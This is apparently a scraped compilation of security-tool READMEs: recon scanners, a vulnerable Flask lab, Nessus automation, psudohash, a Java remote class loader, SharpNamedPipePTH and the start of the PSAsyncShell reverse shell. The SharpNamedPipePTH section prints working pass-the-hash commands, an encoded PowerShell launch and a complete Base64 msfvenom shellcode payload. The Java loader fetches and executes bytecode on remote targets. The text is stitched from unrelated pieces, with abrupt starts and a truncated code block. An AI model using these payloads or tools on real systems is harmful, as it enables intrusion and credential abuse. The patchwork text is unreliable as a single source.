Naabu | Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply |
assetfinder | Find domains and subdomains potentially related to a given domain |
httprobe | Take a list of domains and probe for working http and https servers |
knockpy | Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack |
waybackurl | fetch known URLs from the Wayback Machine for *.domain and output them on stdout |
Logsensor | A powerful sensor tool to discover login panels and perform POST form SQLi scanning |
Subzy | Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz |
XSStrike | Advanced XSS detection suite |
Altdns | Subdomain discovery through alterations and permutations |
Nosqlmap | NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database |
ParamSpider | Parameter miner for humans |
GoSpider | GoSpider - Fast web spider written in Go |
eyewitness | EyeWitness is a Python tool written by @CptJesus and @christruncer. Its goal is to help you efficiently assess which assets of your target to look into first. |
CRLFuzz | A fast tool to scan CRLF vulnerability written in Go |
DontGO403 | dontgo403 is a tool to bypass 40X errors |
Chameleon | Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technology |
uncover | uncover is a Go wrapper using the APIs of well-known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and use the results with your current pipeline tools |
wpscan | WordPress Security Scanner |
sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
Edit /etc/profile (or ~/.profile) and add:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile # reload your shell profile
git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh
Erlik 2 - Vulnerable-Flask-App
Tested - Kali 2022.1
It is a vulnerable Flask web app: a lab environment created for people who want to improve their skills in web penetration testing.
It contains the following vulnerabilities.
git clone https://github.com/anil-yelken/Vulnerable-Flask-App
cd Vulnerable-Flask-App
sudo pip3 install -r requirements.txt
python3 vulnerable-flask-app.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
Today, with the spread of information technology systems, investments in cyber security have increased greatly. Vulnerability management, penetration tests and various analyses are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader among vulnerability management tools, you can detect an IP address that has just joined the corporate network, a newly opened port, and exploitable vulnerabilities; this Python application works integrated with Tenable Nessus to identify these automatically.
git clone https://github.com/anil-yelken/Nessus-Automation
cd Nessus-Automation
sudo pip3 install -r requirements.txt
The SIEM IP address in the codes should be changed.
To detect a new IP address reliably, the script checks whether the phrase "Host Discovery" appears in the Nessus scan name; live IP addresses are recorded in the database with a timestamp, and any new (difference) IP address is sent to SIEM. The contents of the hosts table look as follows:
Usage: python finding-new-ip-nessus.py
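The new-host detection described above boils down to a set difference between the hosts seen in the current scan and those already recorded; a minimal sketch of that logic (function and variable names are illustrative, not from the repository):

```python
from datetime import datetime

def find_new_hosts(previous, current):
    """Return hosts present in the current Host Discovery scan
    but not recorded before -- only these would go to SIEM."""
    return sorted(set(current) - set(previous))

def record_with_timestamp(hosts):
    """Pair each newly seen host with a timestamp, as stored in the hosts table."""
    stamp = datetime.now().strftime("%d %B %Y %I:%M%p")
    return [(host, stamp) for host in hosts]

previous = ["192.168.1.10", "192.168.1.20"]
current = ["192.168.1.10", "192.168.1.20", "192.168.1.30"]
print(find_new_hosts(previous, current))  # only the difference is forwarded
```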
By checking the port scans made by Nessus, port-IP-timestamp information is recorded in the database; the script detects a newly opened service from the database and transmits the data to SIEM in the form "New Port:" port-IP-timestamp. The result observed by SIEM is as follows:
Usage: python finding-new-port-nessus.py
Among the findings of vulnerability scans in institutions and organizations, exploitable vulnerabilities should be closed first. The script records vulnerabilities that can be exploited with Metasploit in the database and transmits this information to SIEM whenever it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:
Usage: python finding-exploitable-service-nessus.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using the Java ClassLoader together with the Reflection API. The client receives the class file from the server and returns the respective execution output. Payloads must be written in Java and compiled before starting the server.
The tool has been tested using OpenJDK 11 with the JRE Java package, both on Windows and Linux (zip portable version). The Java version should be 11 or higher due to dependencies.
https://www.openlogic.com/openjdk-downloads
$ java -jar java-class-loader.jar -help
usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server
Assuming you have the following Hello World payload in the Payload.java file:
//Payload.java
public class Payload {
public static String exec() {
String output = "";
try {
output = "Hello world from client!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}
Then you should compile it to produce the respective Payload.class file.
To run the server process listening on port 1337 on all net interfaces:
$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class
Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
On the client side, you may use the same JAR package with the -client flag and the symmetric key generated by the server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting the class file from the server while maintaining the connection.
$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server
Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related to the development of this tool.
https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis
https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7
https://venishjoe.net/post/dynamically-load-compiled-java-class/
https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php
https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/
https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html
https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html
WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.
Wardriving is done by combining the SSID information obtained with scapy with the HTML5 geolocation feature.
I cannot be held responsible for malicious use of this tool.
ssidBul.py has been tested via TP-LINK TL WN722N.
Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.
SSID and MAC names and location information were created and changed in the test environment.
ssidBul.py and location.py must be run concurrently.
ssidBul.py result:
20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
Here is a screenshot of allowing location information while running location.py:
The screenshot of the location information is as follows:
location.py result:
lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
After the data collection processes, the following output is obtained as a result of running wardriving.py:
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
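The wardriving.py output above is effectively a join of the location log and the SSID log on their shared timestamp field; a rough sketch of that merge (field layout inferred from the sample output, not the tool's actual code):

```python
def join_logs(location_lines, ssid_lines):
    """Join 'lat|lon|timestamp' records with 'timestamp|mac|ssid'
    records on the timestamp field."""
    ssids_by_time = {}
    for line in ssid_lines:
        stamp, mac, ssid = line.split("|")
        ssids_by_time.setdefault(stamp, []).append((mac, ssid))
    merged = []
    for line in location_lines:
        lat, lon, stamp = line.split("|")
        for mac, ssid in ssids_by_time.get(stamp, []):
            merged.append(f"{lat}|{lon}|{stamp}|{mac}|{ssid}")
    return merged

locations = ["lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM"]
ssids = ["20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M"]
print(join_logs(locations, ssids))
```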
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
A dead link (broken link) is a link within a web page that cannot be reached. Such links can have a negative impact on SEO and security. This tool makes it easy to identify and fix them.
Install with Gem
gem install deadfinder
Docker Image
docker pull ghcr.io/hahwul/deadfinder:latest
Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.
Options:
c, [--concurrency=N] # Set Concurrency
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result
# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe
# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt
# Scan the Single URL.
deadfinder url https://www.hahwul.com
# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml
deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json
cat output.json | jq
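At its core, dead-link detection is just fetching each extracted URL and flagging error responses or failed connections; a simplified Python sketch of the idea (deadfinder itself is a Ruby gem, so this only illustrates the concept):

```python
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

def is_dead(url, timeout=10):
    """Treat HTTP error statuses and connection failures as dead links."""
    try:
        req = Request(url, method="HEAD", headers={"User-Agent": "link-checker"})
        with urlopen(req, timeout=timeout) as resp:
            return resp.status >= 400
    except HTTPError as e:
        return e.code >= 400
    except URLError:
        return True  # DNS failure, refused connection, timeout, ...

# A reserved .invalid hostname reliably fails to resolve:
print(is_dead("http://definitely-not-a-real-host.invalid/"))
```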
Store and retrieve your passwords from a secure offline database. Check if your passwords have been leaked previously to prevent targeted password reuse attacks.
Pmanager depends on the "pkg-config" and "libssl-dev" packages on Ubuntu. Simply install them with:
sudo apt install pkg-config libssl-dev -y
Download the binary according to your OS from releases, add the binary's location to your PATH environment variable, and you are good to go.
sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install
git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release
I have not been able to test pmanager on a Mac system, but you should be able to build it from source ("cargo build --release"), since there is no OS-specific functionality.
First, the database needs to be initialized using the "init" command.
# Initializes the database in the home directory.
pmanager init --db-path ~
# Insert a new user and password pair to the database.
pmanager insert --domain github.com
# Get a specific record by domain.
pmanager get --domain github.com
# List every record in the database.
pmanager list
# Update a record by domain.
pmanager update --domain github.com
# Deletes a record associated with domain from the database.
pmanager delete github.com
# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0
USAGE:
pmanager [OPTIONS] [SUBCOMMAND]
OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information
SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain has been leaked. This option
uses the xposedornot API. The check is achieved by hashing the specified
domain's password and sending the first 10 hexadecimal characters to the
xposedornot service
list Lists every record in the database
update Update a record from database
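The leaked check described above only ever transmits a short hash prefix, never the password itself. The prefix derivation can be sketched as follows (SHA-512 is used here purely for illustration; the actual digest pmanager uses is whatever the xposedornot API expects):

```python
import hashlib

def leaked_check_prefix(password, length=10):
    """Hash the stored password and keep only the first `length` hex
    characters -- this prefix is all that leaves the machine; the
    lookup service matches it against known breached hashes."""
    return hashlib.sha512(password.encode()).hexdigest()[:length]

prefix = leaked_check_prefix("hunter2")
print(prefix, len(prefix))  # a 10-character hex prefix, safe to transmit
```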
Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj
SpyCast is a cross-platform mDNS enumeration tool that can work either in active mode, by recursively querying services, or in passive mode, by only listening to multicast packets.
cargo build --release
OS-specific bundle packages (for example dmg and app bundles on macOS) can be built via:
cargo tauri build
SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:
cargo build --no-default-features --release
Run SpyCast in active mode (it will recursively query all available mDNS services):
./target/release/spycast
Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):
./target/release/spycast --passive
Run spycast --help
for the complete list of options.
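Passive mode amounts to joining the mDNS multicast group and reading whatever packets other hosts emit, without ever sending a query. A minimal Python sketch of that listening setup (SpyCast itself is written in Rust; this only illustrates the mechanism):

```python
import socket
import struct

MDNS_GROUP, MDNS_PORT = "224.0.0.251", 5353  # well-known mDNS group/port

def open_mdns_listener():
    """Bind to the mDNS port and join the multicast group; reading from
    this socket sends no traffic, matching passive mode."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", MDNS_PORT))
    mreq = struct.pack("4sl", socket.inet_aton(MDNS_GROUP), socket.INADDR_ANY)
    try:
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    except OSError:
        pass  # no multicast-capable interface; socket is still bound
    return sock

sock = open_mdns_listener()
print("listening on UDP", MDNS_PORT)
# sock.recvfrom(4096) would now block until another host multicasts
sock.close()
```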
This project is made with ♥ by @evilsocket and it is released under the GPL3 license.
psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.
System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:
The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):
transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]
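Applying such a substitution schema is essentially a cartesian product over per-character options: each character is either kept or swapped for one of its substitutes. A simplified sketch of that expansion (not the tool's actual implementation; the substitution map below is a subset of the schema shown above):

```python
from itertools import product

# Subset of the default substitution schema, as a dict of options
transformations = {'a': ['@'], 'e': ['3'], 'i': ['1', '!'],
                   'o': ['0'], 's': ['$', '5'], 't': ['7']}

def mutations(word):
    """Return every variant where each character is either kept or
    replaced by one of its configured substitutes."""
    options = [[ch] + transformations.get(ch, []) for ch in word.lower()]
    return {''.join(combo) for combo in product(*options)}

print(sorted(mutations("pass")))  # 'pass', 'p@ss', 'pa$5', 'p@$$', ...
```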
When it comes to people, I think we all have (more or less) set passwords using a mutation of one or more words that mean something to us, e.g. our name or a wife/kid/pet/band name, with the year we were born stuck at the end, or maybe a super secure padding like "!@#". Well, guess what?
No special requirements. Just clone the repo and make the script executable:
git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py
./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]
The help dialog [ -h, --help ] includes usage details and examples.
Using --years and --append-numbering with a --numbering-limit ≥ the last two digits of any year input will most likely produce duplicate words, because of the mutation patterns implemented by the tool.
I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.
export PPSSWWDD=yourRootPswd
More references: config/doNmapScan.sh. By default, naabu is used to complete port scanning; add -stats=true to view the scanning progress. Can I skip port scanning?
noScan=true ./scan4all -l list.txt -v
# use an existing nmap result file directly (default noScan=true)
./scan4all -l nmapResult.xml -v
TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
---|---|---|---|---|---|---|---|---|---|
cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 |
panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 |
lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 |
xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 |
wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | ||
exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | ||
cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | ||||
rce | 313 | princechaddha | 147 | workflows | 187 | ||||
wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | ||||
tech | 282 | gy741 | 126 | file | 76 |
281 directories, 3922 files.
Supports 7000+ web fingerprints for scanning and identification
Supports 146 protocols and 90000+ rules for port scanning
Fast HTTP sensitive file detection, with customizable dictionaries
Landing page detection
Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT
Supports multiple output types - JSON/TXT/CSV/STDOUT
Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]
Smart SSL Analysis:
Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs
Smart processing:
Automated supply chain identification, analysis and scanning
Integrates the python3 log4j-scan tool:
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
Intelligently identifies honeypots and skips those targets. This function is disabled by default; you can set EnableHoneyportDetection=true to enable it
Highly customizable: define your own dictionary through the config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.
Supports HTTP request smuggling: CL-TE, TE-CL, TE-TE, CL_CL, BaseErr
Supports passing a cookie via parameter: Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com; compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, HTTP smuggling
download from Releases
go install github.com/hktalent/scan4all@2.6.9
scan4all -h
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD/config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh
# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 192.168.0.111 is the target to query
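The manual query above can be wrapped in a small helper; a sketch that only builds the _search URL (the nmap_index name comes from initEs.sh, the helper name is illustrative):

```python
ES_BASE = "http://127.0.0.1:9200"

def search_url(index, target):
    """Build an Elasticsearch _search URL that queries documents by _id,
    mirroring the manual query shown above."""
    return f"{ES_BASE}/{index}/_doc/_search?q=_id:{target}"

print(search_url("nmap_index", "192.168.0.111"))
```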
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v
For more, see: discussions
Unofficial Flipper Zero CLI wrapper written in Python
$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt
from pyflipper import PyFlipper
#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")
#OR
#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")
#Info
info = flipper.power.info()
#Poweroff
flipper.power.off()
#Reboot
flipper.power.reboot()
#Reboot in DFU mode
flipper.power.reboot2dfu()
#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")
#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")
#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")
#List installed apps
apps = flipper.loader.list()
#Open app
flipper.loader.open(app_name="Clock")
#Get flipper date
date = flipper.date.date()
#Get flipper timestamp
timestamp = flipper.date.timestamp()
#Get the processes dict list
ps = flipper.ps.list()
#Get device info dict
device_info = flipper.device_info.info()
#Get heap info dict
heap = flipper.free.info()
#Get free_blocks string
free_blocks = flipper.free.blocks()
#Get bluetooth info
bt_info = flipper.bt.info()
#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")
#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")
#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")
#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")
#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")
#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")
#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")
#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")
#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")
#Write file in one chunk
file = "/ext/bar.txt"
text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.file(file, text)
#Write file using a listener
file = "/ext/foo.txt"
text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.start(file)
time.sleep(2)
flipper.storage.write.send(text_one)
text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)
time.sleep(3)
#Don't forget to stop
flipper.storage.write.stop()
#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)
#Set blue led off
flipper.led.blue(value=0)
#Set green led value
flipper.led.green(value=175)
#Set backlight on
flipper.led.backlight_on()
#Set backlight off
flipper.led.backlight_off()
#Turn off led
flipper.led.off()
#Set vibro True or False
flipper.vibro.set(True)
#Set vibro on
flipper.vibro.on()
#Set vibro off
flipper.vibro.off()
#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)
#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"
#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)
#Stop loop
flipper.music_player.stop()
#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)
#Beep
flipper.music_player.beep()
#Beep for 5 seconds
flipper.music_player.beep(duration=5)
#Synchronous default timeout 5 seconds
#Detect NFC
nfc_detected = flipper.nfc.detect()
#Emulate NFC
flipper.nfc.emulate()
#Activate field
flipper.nfc.field()
#Synchronous default timeout 5 seconds
#Read RFID
rfid = flipper.rfid.read()
#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)
#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")
#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")
#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])
#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)
#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()
#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()
#Activate debug mode
flipper.debug.on()
#Deactivate debug mode
flipper.debug.off()
#Search
response = flipper.onewire.search()
#Get
response = flipper.i2c.get()
#Input dump
dump = flipper.input.dump()
#Send input
flipper.input.send("up", "press")
Feel free to contribute in any way
ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7
ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54
BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat
This project is a C# tool for using Pass-the-Hash authentication on a local named pipe for user impersonation. You need local administrator or SeImpersonate rights to use it. There is a blog post with an explanation:
https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/
It is heavily based on the code from the project Sharp-SMBExec.
I faced certain offensive security project situations in the past where I already had the NTLM hash of a low-privileged user account and needed a shell for that user on the currently compromised system - but that was not possible with the existing public tools. Imagine two more facts for a situation like that: the NTLM hash could not be cracked, and there is no process of the victim user to execute shellcode in or to migrate into. This may sound like an absurd edge case for some of you, yet I have experienced it multiple times. In more than one engagement I spent a lot of time searching for the right tool/technique for that specific situation.
My personal goals for a tool/technique were:
Getting a shell for low-privileged accounts - depending on engagement goals, it might be needed to access a system as a specific user such as the CEO, HR accounts, SAP administrators or others.
The impersonated user unfortunately has no network authentication allowed, as the new process is using an impersonation token, which is restricted. So you can only use this technique for local actions as another user.
There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):
SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe
SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"
Or you can execute shellcode as the other user:
SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=
Which is the Base64-encoded output of msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.
I'm not happy with the shellcode execution yet, as it currently spawns notepad as the impersonated user and injects shellcode into that new process via a D/Invoke CreateRemoteThread syscall. I'm still looking for a way to spawn a process in the background or execute shellcode without needing a process of the target user for memory allocation.
PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.
Unlike other reverse shells, all communication and execution flow is done asynchronously, allowing it to bypass some firewalls and some countermeasures against this kind of remote connection.
Additionally, this tool features command history, screen wiping, file upload and download, information splitting into chunks, and reverse Base64 URL-encoded traffic.
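The chunking and URL-safe Base64 encoding are easy to illustrate. The following Python sketch is not PSAsyncShell's code (the tool is pure PowerShell) and the chunk size is an arbitrary assumption; it only shows the round trip that this style of traffic encoding relies on.

```python
import base64

def to_chunks(data: bytes, size: int = 1024):
    """Split a payload into fixed-size chunks before transmission
    (the 1024-byte size is an illustrative assumption)."""
    return [data[i:i + size] for i in range(0, len(data), size)]

def encode_chunk(chunk: bytes) -> str:
    # URL-safe Base64 avoids '+' and '/', keeping the traffic URL-friendly
    return base64.urlsafe_b64encode(chunk).decode()

def decode_chunk(text: str) -> bytes:
    return base64.urlsafe_b64decode(text)

payload = b"whoami\n" * 500          # 3500 bytes of example command output
wire = [encode_chunk(c) for c in to_chunks(payload)]
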